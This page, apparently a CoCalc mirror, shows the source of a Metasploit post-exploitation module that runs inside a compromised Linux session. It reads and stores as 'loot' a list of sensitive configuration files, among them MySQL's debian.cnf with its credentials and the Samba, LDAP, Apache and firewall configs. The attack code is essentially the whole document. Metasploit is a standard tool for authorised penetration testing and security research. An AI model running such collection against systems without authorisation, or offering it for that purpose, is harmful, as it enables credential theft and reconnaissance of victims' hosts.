Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/linux/gather/enum_configs.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Linux::System

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Linux Gather Configurations',

14
        'Description' => %q{

15
          This module collects configuration files found on commonly installed

16
          applications and services, such as Apache, MySQL, Samba, Sendmail, etc.

17
          If a config file is found in its default path, the module will assume

18
          that is the file we want.

19
        },

20
        'License' => MSF_LICENSE,

21
        'Author' => [

22
          'ohdae <bindshell[at]live.com>',

23
        ],

24
        'Platform' => ['linux'],

25
        'SessionTypes' => ['shell', 'meterpreter'],

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33
  end

34


35
  def run

36
    distro = get_sysinfo

37


38
    print_status "Running module against #{session.session_host} [#{get_hostname}]"

39
    print_status 'Info:'

40
    print_status "\t#{distro[:version]}"

41
    print_status "\t#{distro[:kernel]}"

42


43
    vprint_status 'Finding configuration files...'

44
    find_configs

45
  end

46


47
  def save(file, data, ctype = 'text/plain')

48
    ltype = 'linux.enum.conf'

49
    fname = ::File.basename(file)

50
    loot = store_loot(ltype, ctype, session, data, fname)

51
    print_good("#{fname} stored in #{loot}")

52
  end

53


54
  def find_configs

55
    configs = [

56
      '/etc/apache2/apache2.conf', '/etc/apache2/ports.conf', '/etc/nginx/nginx.conf',

57
      '/etc/snort/snort.conf', '/etc/mysql/my.cnf', '/etc/ufw/ufw.conf',

58
      '/etc/ufw/sysctl.conf', '/etc/security.access.conf', '/etc/shells',

59
      '/etc/security/sepermit.conf', '/etc/ca-certificates.conf', '/etc/security/access.conf',

60
      '/etc/gated.conf', '/etc/rpc', '/etc/psad/psad.conf', '/etc/mysql/debian.cnf',

61
      '/etc/chkrootkit.conf', '/etc/logrotate.conf', '/etc/rkhunter.conf',

62
      '/etc/samba/smb.conf', '/etc/ldap/ldap.conf', '/etc/openldap/openldap.conf',

63
      '/etc/cups/cups.conf', '/etc/opt/lampp/etc/httpd.conf', '/etc/sysctl.conf',

64
      '/etc/proxychains.conf', '/etc/cups/snmp.conf', '/etc/mail/sendmail.conf',

65
      '/etc/snmp/snmp.conf'

66
    ]

67


68
    configs.each do |f|

69
      output = read_file(f).to_s

70
      next if output.strip.empty?

71
      next if output =~ /No such file or directory/

72


73
      save(f, output)

74
    end

75
  end

76
end

77


78